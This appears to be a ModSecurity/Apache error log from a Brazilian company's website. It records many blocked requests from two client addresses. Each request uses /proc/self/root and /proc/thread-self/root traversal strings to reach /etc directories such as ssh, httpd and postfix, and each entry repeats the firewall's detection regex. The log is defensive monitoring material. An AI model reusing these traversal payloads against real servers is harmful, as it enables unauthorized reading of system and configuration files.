[Mon Mar 16 16:46:54.830991 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:51372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheLv9ocpUE4ed4uDwGcgAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:57.227225 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:51382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheMf9ocpUE4ed4uDwGdgAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:01.567418 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:37964] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheNbABkC4fWIHEf8EG7QAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:04.058025 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:37974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheNrABkC4fWIHEf8EG7wAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:05.459891 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:37982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheOdSswJuvopo3lOhy4QAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:06.752606 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:37988] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheOv9ocpUE4ed4uDwGgQAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:07.950378 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.241.46:37996] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheO6QpVkWug9HeOt9JFgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:09.347145 2026] [:error] [pid 29802:tid 140411565680384] [client 74.7.241.46:35950] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhePc_BxrYCr4hPDw_-FAAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:09.551847 2026] [:error] [pid 29802:tid 140411641214720] [client 74.7.241.46:35950] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhePc_BxrYCr4hPDw_-FQAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:09.901079 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.243.203:47518] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhePf9ocpUE4ed4uDwGhgAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:11.190311 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:40092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheP7ysWC90G-1nBrBXoQAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:12.054985 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:35966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheQLysWC90G-1nBrBXogAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:12.516223 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:40106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheQI6lpbStxTqkSkt-PwAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:13.374928 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:35974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheQf9ocpUE4ed4uDwGhwAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:16.173706 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.243.203:40116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheREr9dMAiw-8KANNaygAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:16.495061 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:35990] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheRLABkC4fWIHEf8EG9wAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:19.015985 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:36006] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheRdSswJuvopo3lOhy5QAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:20.392500 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:59196] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheSLABkC4fWIHEf8EG-wAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:21.596084 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.241.46:59210] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheSY6lpbStxTqkSkt-QgAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:22.930391 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.241.46:59212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheSqTCbgAP5jq5TehAgAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:24.188367 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:59226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheTLABkC4fWIHEf8EG_gAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:26.787036 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:59234] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 